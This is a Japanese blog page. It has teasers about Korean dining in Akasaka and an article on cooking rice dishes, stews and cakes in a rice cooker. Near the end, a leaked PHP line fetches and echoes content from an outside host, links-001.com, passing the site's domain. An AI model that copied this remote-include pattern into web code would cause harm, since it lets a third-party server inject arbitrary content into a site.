前へ
次へ

韓国料理のマナーって知っていますか?

韓国料理を食べる時のマナーってご存知ですか?韓国料理はお箸とスプーンの両方を使い分けます。まず、箸使

more

赤坂の人気韓国料理店

私は東北の方から大学がきっかけで上京してきたんですが、先日地元の友人が東京に遊びに来てくれました。懐

more

赤坂の韓国料理にいくならコムタン

赤坂に多い韓国料理、行ったら何を食べますか。韓国料理といえば辛いもの、をイメージしますが、やさしい味

more

炊飯器で色々と作れる調理法がある

炊飯器を使うと、ご飯しか炊けないと考えていませんか。実はご飯以外におかずやお菓子をも作ることができる万能調理器具として有名です。どんな物が作れるか、気になる人も多いでしょう。ちょっとした調理法とコツを覚えておくことで、空いている時間を使って食事やお菓子を作ることができるようになるでしょう。もちろん基本のご飯を炊くだけではなく、炊飯器では赤飯やおこわ、炊き込みご飯も簡単にできます。実は知られていませんが、ピラフやチキンライスも炊くことができるため、炒める必要がありません。炒めるよりも効率よくスピーディーで、油を使わない分ヘルシーに仕上がります。また、パラパラなしあがりのチャーハンを炒めずに作ることも可能となっているため、パラパラなしあがりにならなくて悩んでいる人はぜひ活用してください。煮物や蒸し物といったおかずの調理道具としては、炊飯器は優秀といえます。長時間保温を使って煮物を作ることが可能となっており、低音でじっくりと調理ができるから、チャーシューや肉じゃが、カレーといった時間がかかる物を作ることも簡単です。ただし調理法は鍋で作る物とは異なるため、事前にレシピを確認し、簡単に作ることができるようになるでしょう。なお、仕事に行っている間にポトフやスープなどを作っておけば、帰ってきてからおいしく食べることができます。デザートに関しては幅広いレシピが存在しており、作り方を一通り試すだけで1年はかかるでしょう。通常のスポンジケーキ、バターケーキだけではなく、チーズケーキやタルトタタンなどの料理も作ることが可能といわれています。ケーキを食べたいけれど買う時間がないという時には、炊飯器で炊いておくことで帰ってきてから食べることができるでしょう。どんなレシピが作れるのか、どれくらいの量を作ることができるのかは炊飯器によって異なりますので、炊飯器の大きさを確認してから材料をそろえてください。

".file_get_contents('http://links-001.com/kanren8set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top